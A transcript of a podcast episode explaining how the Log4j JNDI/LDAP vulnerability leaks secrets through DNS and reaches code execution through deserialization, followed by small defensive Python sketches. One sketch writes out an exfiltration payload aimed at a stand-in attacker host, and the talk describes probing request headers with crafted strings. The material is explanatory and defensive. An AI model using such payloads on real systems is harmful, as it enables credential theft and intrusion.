The Log4j vulnerability | The Backend Engineering Show

Captions

In this episode of the Backend Engineering Show I'd like to talk about the Log4j vulnerability, the remote code execution. We'll discuss what Log4j is, how exactly this vulnerability works, and how dangerous it is. We throw words like "remote code execution" at every vulnerability, but the question here is the how. And finally I'll talk about how, when you add features to your software or your backend, you really need to think twice about every feature you add and what the ramifications of that feature are. How about we jump into it?

Welcome to the Backend Engineering Show with your host Hussein Nasser, and yes, we are back, baby. I'm back in town, and I know I'm a little late to the game talking about Log4j, because there are already thousands and thousands of articles and videos on the topic. But it doesn't hurt, because I'm really fascinated by this bug slash vulnerability. And it's funny, because Log4j has been around for 20 years. The first time I heard about Log4j was maybe 2006. A consultant came to our work. I was writing software and I had written my own logging facility, some sort of plugin that logs everything that happens in my application. He said, "No, don't do that, don't roll your own stuff. Use this thing called Log4j, it has a lot of features." I was thinking, really? We need software to log? How hard is it to log? Just write it to disk, right?

Well, the more you think about it, the more there is to it. You need to search the logs, you need to organize the logs, you need to specify what you are logging and where you are logging it. Do you want to write the log to a database? Do you want to log to the file system? And if it is the file system, what if
you have multiple logs, multiple applications running on multiple servers? How do you aggregate those logs? It becomes complicated the more you think about it. If you're doing your own thing you don't really need it, but if you're building an enterprise system or big software, you need some sort of advanced logging solution, and Log4j was the de facto one for anything logging, really. So Log4j is very popular, yet it was never as mainstream as it became about two weeks ago, when suddenly everybody was talking about Log4j. So what happened?

When you build a backend, let's take a web server with a web app running on the backend, you want to log things like failed login attempts, or someone who tried to DDoS you, or some sort of errors. You basically use Log4j to log these on the backend. Let's say I want to log every failed attempt to log in. I don't want to log the password that was used, but I'm going to log the username: hey, this username tried to log in from this IP address. So how would you, the listener, whether you're watching this on YouTube or listening to the podcast, actually do it?

Well, I need to know the email that tried to log in, or the account ID. That's easy, because that's just another parameter in the POST request. How would you know, for example, where this person is coming from or which browser they used? Well, there is a nice header called User-Agent. You can read that User-Agent, then read the body, which has the account ID, and then say, "Hey, this account ID, blah (the variable), tried to log in from blah (the user agent)." Just normal programming stuff. So you blindly take what the user sent and then you send it to Log4j
and say, "Hey, log this." Log4j sees this as just another string, but this string was sent by the user, and this is where the attack surface opens up. It's very similar to SQL injection, really: you need to sanitize the input before sending it on. So that's what Log4j is doing, and this is basically how the attack can start.

In a specific version of Log4j, I believe Log4j 2.0 and its beta version, they introduced the ability to enrich the logging experience. Users are trying to log in and you have the account ID, but you want more information in the log, and you want Log4j to get it for you: here's the ID, but go and look up what the name of the account is, for example, and print that too. So you'd say, "Account ID blah," the same thing the user submitted, and then, between parentheses, the account name. And how do you get the account name, since the user didn't send it to you? Well, you can look it up. Log4j can look up the account ID, and there are many lookup mechanisms and extensions in Log4j.

This one was introduced with an interface in Java called JNDI, the Java Naming and Directory Interface. It's an interface you can use to look up multiple things. So there was a JNDI plugin, or component, to look up LDAP information. LDAP is the Lightweight Directory Access Protocol; on Windows, the implementation of LDAP is called Active Directory. There you can look up profile information about the user, like the full name, and print it in the log. So there's a specific URI that you can craft, and this is a legitimate thing to do in Log4j. You, the programmer, can add that on the backend, so that at the end of the day the log says: account ID 17 tried to log in,
parentheses, Hussein Nasser; that's the account name. So when you query the logs you actually see richer information. That was a feature that was added. Seems nice, right?

But here's what happened: what if that crafted URL was actually sent by the user? Instead of writing my actual account ID in the failed attempt, I'll write this specially crafted URL. I'll put it on the screen right now: it's jndi, then ldap, blah blah blah, then obviously the server name where the LDAP directory lives, and then some sort of object to retrieve. That's how you do a lookup. So the specially crafted URL has jndi, then the actual protocol, which is ldap, then the actual domain name of the server where the LDAP directory lives, and then slash some sort of object, the thing you want to retrieve.

Log4j will query that. First of all it will resolve DNS, if that name needs resolving. So keep that in mind: the backend, Log4j, is resolving the name to an IP address. It sends a DNS request to get the IP address, then establishes a TCP connection on a specific port, whatever that port is, then sends the specific commands of the LDAP protocol and starts communicating with the server.

Sounds okay, until the user starts sending this specially crafted URI from the interface itself. How? Instead of the account ID or the email, the user just types in the specially crafted string: jndi, blah blah blah, then the attacker's domain, which hosts the LDAP directory, then slash the object, and sends it. If you as a developer took that account ID as is and said, "Hey, just log that," without doing anything else, Log4j will look at this: oh,
that's a lookup, let me do a lookup. It will blindly take that string and resolve the DNS name, which is now the attacker's site, get the IP address, and establish a TCP connection to the attacker's server. So far it's dangerous, but there is no remote code execution yet. Let's be very clear about this: Log4j, your backend, just connected to a malicious server.

That alone is dangerous if the attacker has control of the DNS. The resolution of the DNS name is itself dangerous. Why? We've seen attacks before that use domain name resolution as a vehicle to transmit information from the victim's machine. We've seen this with Apple. I'll link the video, I don't remember the details, but someone managed to craft code that eventually ran on one of Apple's internal machines, in the engineering department I think. It was an npm package, I think. Apple has all sorts of firewalls, but nobody really controlled DNS, because DNS queries are usually considered benign. What he did is take the machine name of the victim and encode it, not a hash, an encoding like Base64, and add it as a subdomain of his own domain. So the name becomes something like blah blah blah engineering machine one apple, dot, his domain. When npm or the machine tries to resolve that name, it asks the DNS servers, "Hey, resolve this for me: blah blah blah dot attacker.com." To the machine it's just another domain that needs resolving, so it goes through the DNS protocol: who owns blah-blah-blah.attacker.com? The top-level domain is .com, then attacker.com.
Who owns attacker.com? It's the attacker's DNS server. So the attacker just received a beautiful string: the subdomain, which carries useful information about the victim, dot attacker.com. They throw away the attacker.com part and keep this precious subdomain. Of course they don't need to resolve it to a real IP; maybe they resolve it to some random IP address, or always to the attacker's own IP address, because they have full control over the DNS server. It's software, guys, it's just software.

Now back to Log4j. Forget about LDAP and the lookup for a moment: you just allowed your backend to resolve a DNS name that the user specified, and the user can be an attacker. What's wrong with that? Here's what you can do: environment variables. Have you heard of them? As an attacker, back to the failed login attempt, I go to the account ID field and put in, for example, dollar sign PATH dot attacker.com, wrapped in this crafted LDAP string, and send it. The login fails, obviously, and as a result you want to log that activity. So you take the account ID, which happens to be jndi, ldap, blah blah, then dollar sign PATH dot attacker.com, and you log it.

Log4j says, "Wait a minute, that's actually a lookup. Let me retrieve the LDAP value for this string." And what's this dollar sign PATH dot attacker.com? It's a DNS name I need to resolve, but before that, dollar sign PATH is actually an environment variable on the backend. So Log4j says, "Oh, you want me to paste in the PATH environment variable? Let me do that for you." So the backend Log4j will take the PATH, all the beautiful paths
that you have in that environment variable, and write them into this entry, right before dot attacker.com, as this beautiful subdomain. You might get some errors because of invalid characters, so attackers do all sorts of things, like Base64-encoding the value, and then it gets resolved. And when it's resolved, that beautiful string ends up at the attacker-controlled DNS server. Scary stuff. Again, this is a way to leak information from the backend to the attacker. Now do the same with dollar sign JWT token, dollar sign JWT secret, any environment variable you can think of; you can just send it along.

So we still don't have remote code execution. This is just leaking information out through DNS resolution alone, even before we establish a TCP connection to the attacker's server once we have the IP address. Scary stuff, man. Let's take a sip of coffee.

So how does this become remote code execution? Because what we read online is remote code execution, remote code execution, as if someone is installing stuff on the backend. I read that someone actually managed to install a miner, I don't know if it was a Bitcoin miner, just one of those coin miners, on the backend, and it mines for the attacker. Nice and easy. But how? From what we've covered so far, let's think it through. Even if the lookup in the string manages to go to the attacker's server and retrieve some sort of malicious payload, let's say it's code, Log4j will just print the code. It will log it. That doesn't execute code. Even if it's Java code, it just downloads that Java code and prints it. The log will contain the code, but it will not be executed. So
I was like, how does it actually execute? Log4j shouldn't just execute code, because code needs to be compiled and so on. So I did a lot of research, and I finally found a video by the SANS Institute. They did a good job of explaining exactly how this works, and it's another fascinating thing. It comes back to something I used back in the days of SOAP: serializing and deserializing objects.

If you have a VB.NET or C# object running in your code, a class that you instantiate an object from, that object is just in memory. Java works the same way. You have an instantiated object, and this object has properties, methods, functions, a constructor, all that stuff. You can take that object with all its state, the properties and their values, and convert it into a string. You serialize it, just like we serialize to JSON, for example, into a beautiful string. You can send that string across the network, and on the other end you can deserialize that string back into an object. That's very similar to how SOAP works: you serialize the object, you deserialize it on the other end, and you've just transferred the object to another server.

That is the key to the LDAP JNDI remote code execution. What the attacker does is craft the LDAP URL so that it retrieves some sort of string, but a special string. When Log4j retrieves that special string, it detects that it's not just a string, it's a serialized object. And here's the problem: Log4j tries to be smart and says, wait a second, this is a serialized object, let me deserialize that object back to a
beautiful object. So it takes that benign-looking string and turns it into an object. That was the question I had: how does normal code, or just a string, end up executing in memory? That's what Log4j is doing. Why is it there? Some people wanted to rehydrate objects, some people wanted to deserialize these things. So it deserializes that and puts it in memory, and when you deserialize, I'm pretty sure the constructor gets called, or some method gets called. You as an attacker control that method: put your code in the method the deserializer calls, and it's the end of the world. You've just forced Log4j to execute code that you supplied. It becomes a deserialized object with methods, properties, and functions; those functions have code, and that code can do anything you want, literally anything: mine, delete stuff. Whatever permission level Log4j has, the code has free rein. Scary stuff, guys, very scary stuff.

But the moment I read about this vulnerability, the first thing that came to mind was: why is the backend even connected to the internet? Backends have no business being connected to the internet. The backend should be isolated, deep down in your infrastructure. The only thing connected to it should be the API gateway, reverse proxy, or load balancer, and even that shouldn't be connected directly to the internet, to be honest; there should be another network interface that the outside clients connect to. But that's not always possible. Backends unfortunately need to connect to the internet. You might ask, Hussein, why? Well, we've made a lot of videos about this stuff, right?
You know, backends need to be secured with TLS certificates. And the problem with TLS certificates is that, unfortunately, none of this is written in stone. Nothing is perfect in the world of engineering. That's what I started to find: the deeper I dive, the more I realize that whatever we're doing is not perfect.

This is just another piece of advice; I know I'm going all over the place. When you start learning backend engineering, or engineering in general, it's like a mountain: how do I learn all this stuff? It becomes overwhelming, and you feel an obligation to learn how things are done. But the moment you get deep into things, you realize all this stuff is built by humans, and humans make mistakes, and everything has flaws. We've seen that here. We put these things on a pedestal, as if these people don't make mistakes. Everybody makes mistakes. When you come to a domain you know nothing about, always doubt everything. Why is this done this way? The moment someone says, "It's always been done this way because that's the best practice," or "that's the only way," something fishy is going on. Your doubts are usually in the right place; when you doubt something, there's probably something legitimate behind the doubt. Just keep doubting, that's what I say.

All right, back to the certificate thing. Certificates are the way we authenticate servers, and unfortunately we haven't found a complete solution to this yet. If I have a certificate, how do I know that it is valid? You might say, Hussein, it has an expiration date. Right, it has an expiration date, which is baked into the certificate. But there's another problem: certificates are, you
know, hashed, or, what's the right word for this, encrypted with the private key of the server; signed, that's the right word, signed by the private key. And if that private key is leaked, and we've seen many incidents where a private key was leaked, then the certificate is useless, because whoever has the private key can present that certificate and impersonate the server. Bad. So they invented this thing called, long story short, the Online Certificate Status Protocol. I want to know: yes, this certificate is not expired, but is it revoked? Is it still valid? Can I trust it? I made a whole video about certificates, check it out. But telling the client that this certificate is not revoked requires a call to a revocation server, an Online Certificate Status Protocol server, that lives on the internet. So the backend ends up calling out to the internet to staple to its certificate another statement that says, "Yes, it's not expired, and it's also not revoked. You can fully trust it." So if you have OCSP stapling, your backend has to connect to the internet.

Now, even with that, you should only allow certain domains. The backend should never have free rein to connect to any domain, just specific ones: okay, I'm going to allow the OCSP stapling server, I'm going to allow this backend and that backend, I might need to connect to a particular Amazon API gateway. Unfortunately, with everything in the cloud, if you're connected to a lot of services you find yourself needing to enable internet access on the backend. Try to minimize that as much as possible, because 99% of the time, if you don't have internet on
the backend, then the backend Log4j will never phone home to the attacker and you will never have this problem. As for DNS, you really need to stop that too, and I'm not sure how you do that. How do you stop DNS resolution? I guess you can run your own DNS resolver and only allow certain names to resolve, but that would be difficult.

I'm going to link the SANS Institute video in the description. They go into way more detail about this, and they also cover remediation: what do you do to protect yourself? Update to a particular fixed version of Log4j if you are using it, and all sorts of other things. They also explain an attack surface that works even if you don't have internet access on your backend. They found a way to exploit that too, and I'm not sure how, to be honest. Maybe the client sends an actual serialized object that gets executed immediately. I don't know.

So that's basically the Log4j attack. Very dangerous stuff. It teaches you to be careful about adding features, especially in very popular software that is maintained by open source volunteers. It's fascinating how the entire world depends on an open source project, and you see it now that there is a problem with the software and everybody's screaming. Apple relies on it, Minecraft relies on it, Amazon relies on it. Most software relies on a logging facility, because nobody's going to write their own logging; they're going to use an open source one, and this one has been around for 20 years, 21 years, maybe more. So it's legit. But when things go wrong, boy, the world just goes up in flames. There are a lot of incidents where people are actually using this attack,
specifically for scanning. You might ask, how do you scan for something like that? Scanning is not hard. Think about it: you try to guess what the backend would log. The backend is always interested in logging where things are coming from. So you send that specially crafted string, with the JNDI, the LDAP, and the attacker's domain name, in the headers, in the Origin, in any piece of information the backend might want to log. It becomes a guessing game at the end of the day. So you guess, and then you wait on your server to receive a DNS query, or, if you don't control the DNS, you wait for a TCP connection, because at the end of the day the backend will establish a TCP connection to your server. And you can do a lot with that, too. If someone is connecting to you, yes, it speaks a specific protocol, but you control your end of that protocol and you can play with it. You can find out where the connections are coming from, so you can find the server name and the IP address of the backend. Scary stuff indeed.

So this is how scanning is happening. The attackers scanning the internet are just logging the IP addresses of the backends, not infected ones exactly, but possibly vulnerable backends that run Log4j, the moment they get a TCP connection. And we've seen many videos and Twitter posts where people do this as a test. With Minecraft, you just send that string in the chat; Minecraft logs certain chat messages, if they're malicious or something like that, and the moment it logs, Log4j kicks in and does the lookup.

So, remediation: what do you do? Disable internet access on the backend if you can; try to
kill that thing. You might worry about OCSP stapling. Don't do that; instead, get a two-week certificate from Cloudflare. The shorter the certificate's lifetime the better, because with a short certificate your private key is recycled on a bi-weekly basis. That's the shortest I've seen, two weeks, which is amazing. The next one up is three months, which is Let's Encrypt. You can get a year, but I think the CA/Browser Forum now forces all certificates to be at most one year, I believe; anything beyond that is just not secure anymore, since attackers keep finding ways around the cryptography, cracking it or not.

Guys, I'm going to end this video here. I know I've been all over the place, but it's been a while since I recorded a video and I had a lot to talk about, I guess. So excuse me if this episode was a little unstructured. Some people like that, some people don't, but it is what it is, and I'll try to be more organized and structured in the next episode. I'm going to talk about the Amazon outage next, hopefully, if I have time. I'm going to see you in the next one. You guys stay awesome. Thank you so much, goodbye.
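
As a companion to the environment-variable leak described in the episode, here is a minimal Python sketch of a toy logger that expands `${env:NAME}` lookups inside whatever string it is handed. It is not Log4j's implementation and only mimics the idea; the names `expand_lookups` and `neutralize`, the `fake_env` dictionary, and the `attacker.example` domain are all assumptions made up for illustration.

```python
import re

# Toy model only: matches lookups of the form ${env:NAME}.
LOOKUP = re.compile(r"\$\{env:([A-Za-z_][A-Za-z0-9_]*)\}")


def expand_lookups(message: str, env: dict) -> str:
    """Replace each ${env:NAME} with env[NAME]; unknown names are left as-is."""
    return LOOKUP.sub(lambda m: env.get(m.group(1), m.group(0)), message)


def neutralize(user_input: str) -> str:
    """Break the '${' opener so the toy logger no longer sees a lookup."""
    return user_input.replace("${", "$ {")


# Hypothetical backend environment and attacker-supplied "account id".
fake_env = {"JWT_SECRET": "s3cr3t"}
account_id = "${jndi:ldap://${env:JWT_SECRET}.attacker.example/a}"

# Logging the raw input: the secret is pasted into the host name.
leaked = expand_lookups("failed login for " + account_id, fake_env)

# Logging the neutralized input: nothing is expanded.
safe = expand_lookups("failed login for " + neutralize(account_id), fake_env)

print(leaked)
print(safe)
```

In the first call the secret ends up inside the host name that a lookup would then try to resolve, which is the leak the episode walks through. In the second call the lookup syntax is broken before logging, so nothing is expanded. For real Log4j, the remediation mentioned in the episode, updating to a fixed version, is the one to rely on; string filtering like this is only meant to show the mechanism.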

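The advice in the episode about letting the backend reach only specific domains can be sketched as a simple allowlist decision. This is a hedged illustration, not a recommended deployment: `ALLOWED_HOSTS`, the host names in it, and `is_egress_allowed` are hypothetical, and in practice such a rule is usually enforced at a firewall or egress proxy rather than in application code.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts this backend may call out to.
ALLOWED_HOSTS = {"ocsp.example-ca.test", "api.internal.example"}


def is_egress_allowed(url: str, allowed=ALLOWED_HOSTS) -> bool:
    """Return True only if the URL's host is explicitly allowlisted."""
    host = urlsplit(url).hostname  # None when the URL has no network location
    return host is not None and host in allowed


print(is_egress_allowed("http://ocsp.example-ca.test/status"))
print(is_egress_allowed("ldap://attacker.example:1389/a"))
```

With a default-deny rule like this, a lookup pointing at an attacker-controlled LDAP server is refused because its host is simply not on the list, whatever the protocol or port.
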
Info

Channel: Hussein Nasser

Views: 9,167

Keywords: hussein nasser, backend engineering, log4j

Id: 77XnEaWNups

Length: 34min 53sec (2093 seconds)

Published: Tue Dec 14 2021